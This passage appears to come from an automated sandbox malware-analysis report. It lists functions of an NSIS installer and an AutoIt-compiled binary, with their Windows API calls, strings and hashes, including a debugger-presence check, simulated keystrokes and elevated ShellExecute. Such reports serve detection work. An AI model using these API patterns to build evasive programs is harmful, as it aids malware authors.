                                                                                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                          • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                          Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                          • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                          • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                          Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                          Function 00007FF68C454364 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                          • API String ID: 3778422247-2988720461
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 41fafe9b36827629db4f60b12a7fbebcad9040b44112fbd3b6694565de27d0f4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E641AB61F0C512C7F754DB25A91873E2292BF88B99F918039D80AC7B64DF7DA889C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C438790 Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3372153169-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                                                                                                                                                                                                                                                                                                          • Instruction ID: ecd8c055d462bb5d6d132425620ffaafb3d7e3e2da872714198a00f0da5b45df
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59229CB2A09A86C6EB648F25D4546BD67B1FF84B98F54413ADE1E87A94DF3CE4C0D300
                                                                                                                                                                                                                                                                                                          Function 00007FF68C432820 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                          • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                                          • Opcode ID: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                                                                                                                                                                                                                                                                                                          • Instruction ID: 29195264425439bd7eea689181bfb80c03134c232a860982edcb725f7a1ca173
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02D16A72A09646CAEB54DF38E8546AD37A1FF88B5CF114139DA0E87AA4DF3CE485C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C434528 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                                          • API String ID: 0-3110715001
                                                                                                                                                                                                                                                                                                          • Opcode ID: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                                                                                                                                                                                                                                                                                                          • Instruction ID: ea9c0c7f125783e0487b7967eb92f1b3a2fafdbb926603623e838f2028d65a60
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFA1BD72A08645CAE724CF25E4146ADBB60FF8479CF509139EB9E83A94CF7CE585CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C472290 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                                                                                                                                                                          • String ID: -$:$:$?
                                                                                                                                                                                                                                                                                                          • API String ID: 3440502458-92861585
                                                                                                                                                                                                                                                                                                          • Opcode ID: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1fc7635b6fb5af14eeb99d8e0faf117a71c0f35b2e19f8bb03631757edf02e4f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20E1D432A08696C6FB349F3598416BA37A1FF8479CF44513AEA4E83A99DF3CD491D700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C433B64 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433BA6
                                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433BBB
                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433C35
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C432BEC: GetFullPathNameW.KERNEL32(?,00007FF68C433C67,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C432C4D
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433CCC
                                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C47AA96
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C47AAE3
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C47AB6A
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C47AB91
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D06
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D16
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D2B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D44
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C433C7D,?,?,?,?,?,00007FF68C432BC1), ref: 00007FF68C433D5D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: LoadImageW.USER32 ref: 00007FF68C433D89
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433CEC: RegisterClassExW.USER32 ref: 00007FF68C433DED
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433E24: CreateWindowExW.USER32 ref: 00007FF68C433E74
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433E24: CreateWindowExW.USER32 ref: 00007FF68C433EC7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C433E24: ShowWindow.USER32 ref: 00007FF68C433EDD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C43477C: Shell_NotifyIconW.SHELL32 ref: 00007FF68C434874
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                                          • API String ID: 1593035822-2030392706
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                                                                                                                                                                                                                                                                                                          • Instruction ID: f9d136ae8d0765b9533e9eb7564bce2fa1dade807ed51c7e0491ebcc38ada169
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65618E62A0D683D9EE10EB30E8605F967A0BFC5358F80403DE58DC79A6DF6CE59AC301
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DAE10 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0640e42022e33a737d8eb2def458af6152ae9067368d775b9534069338d73c9b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d8fe48af58940d741c9d2f4447ef1da36742fd2f0a7ea5dd5e4caa7ea6e18a4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0640e42022e33a737d8eb2def458af6152ae9067368d775b9534069338d73c9b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B871B076609A81C5E720DF65E8506ED37A0FF88B98F41403AEA5D87BA5DF3CD186C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4324D4 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 381COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C432794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF68C47A57D), ref: 00007FF68C4327B1
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C4325EA
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C4326F8
